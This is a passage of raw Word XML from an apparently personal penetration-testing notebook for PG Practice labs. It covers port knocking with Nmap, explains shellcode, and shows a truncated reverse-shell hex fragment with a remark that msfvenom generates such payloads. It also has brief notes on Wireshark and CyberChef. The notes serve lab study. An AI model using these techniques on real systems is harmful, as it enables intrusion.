          <w:numId w:val="196"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used Nmap to "knock" on those ports in order, sending SYN packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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6E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_da1sy8a0nehd" w:id="493"/>
      <w:bookmarkEnd w:id="493"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EC">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Shellcode" is a small piece of machine code (binary instructions) that is crafted to be injected and executed on a target system — usually as part of an exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite its name, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode doesn't always spawn a shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but historically, its purpose was to open a command shell (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Windows) so an attacker could execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, this part:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\xcb\x48\xcb\x56\xc7\x44\x24\x04\x02\x00\x11\x5c...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the binary sequence the machine will execute, and somewhere inside, encoded in network byte order, is the IP and port you specified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Msfvenom seems to be very popular for generating reverse shells in shell code format that are to be placed in the POC for shellcode in exploitdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hexadecimal shellcode:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1161">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they had a hexadecimal shellcode (it was supposed to give a reverse shell), but inside that shell code they have to edit the IP and port number of the payload to make sure the reverse shell connects to right port. So look at the write up for how to navigate that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1162">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">another</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> write up for that too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alphanumeric Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1163">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Kevin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they had a shellcode payload that needed alphanumeric encoding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1164">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writeup for that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see some more shellcode stuff in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1165">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Osaka</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6FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003702">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003703">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7mfwt14wf70c" w:id="494"/>
      <w:bookmarkEnd w:id="494"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003704">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003705">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have javascript (JS) source code, you can use this website and copy/paste your code to make it look good:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1166">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://beautifier.io/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707">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003708">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jjitu5neqr03" w:id="495"/>
      <w:bookmarkEnd w:id="495"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1167">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Payday</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and it found a password but it ended up being a useless password. It was for a FTP login. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003710">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003711">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eh3umgq3eo5h" w:id="496"/>
      <w:bookmarkEnd w:id="496"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberchef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003712">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003713">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberchef link </w:t>
      </w:r>
      <w:hyperlink r:id="rId1168">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1169">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gchq.github.io/CyberChef/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003714">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003715">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, as seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1170">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we have to decode twice. Like in this box, we had to decode binary twice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003716">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003717">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="404" name="image409.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image409.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1171"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="238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18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
